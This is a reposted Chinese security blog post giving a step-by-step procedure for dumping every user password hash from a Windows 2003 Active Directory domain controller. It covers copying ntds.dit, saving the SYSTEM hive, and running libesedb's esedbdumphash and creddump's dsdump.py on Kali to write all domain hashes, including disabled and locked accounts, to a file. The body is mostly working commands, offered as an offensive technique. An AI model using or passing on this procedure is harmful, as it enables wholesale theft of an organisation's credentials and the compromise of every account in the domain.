2003(32/64位)导出AD域控用户hash的终极方法

暗月博客 2019年11月21日17:21:30评论840 views字数 665阅读2分13秒阅读模式

前言:by Metasploit上次写了一篇文章叫QuarksPwDum导出2003 AD域控所有用户hash的方法,这种方法只能导小型域控(几百用户的)。如果碰到几万甚至几十万用户的域控,用上面的方法就不行了,就会崩溃。那我们该怎么办呢?

正文:
一:
1,首先登陆域控提取ntds.dit,提取方法上篇文章有介绍。
2,然后提取注册表cmd>reg save hklm/system system.hive
3, 把这两个文件下载到本地,然后放在虚拟机里面,我这里以kali为例演示(例虚拟机位置为/tmp/)

二:
进入kali虚拟机,然后下载文件ntds_dump_hash.zip (下载地址),解压安装。
#unzip ntds_dump_hash.zip
#cd libesedb
#./configure && make

修复数据库文件
#cd esedbtools
#./esedbdumphash -v -t /tmp/output /tmp/ntds.dit
#ls -1 /tmp/output.export/

导出数据库hash
#cd ../../creddump/
#chmod +x *.py
#./dsuserinfo.py /tmp/output.export/datatable
#./dsdump.py <SYSTEM file> /tmp/output.export/datatable -include-locked -include-disabled > /domain_hashes.txt
2003(32/64位)导出AD域控用户hash的终极方法
2003(32/64位)导出AD域控用户hash的终极方法
by Metasploit
转载请注明出处http://www.metasploit.cn/

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日17:21:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2003(32/64位)导出AD域控用户hash的终极方法http://cn-sec.com/archives/71128.html

发表评论

匿名网友 填写信息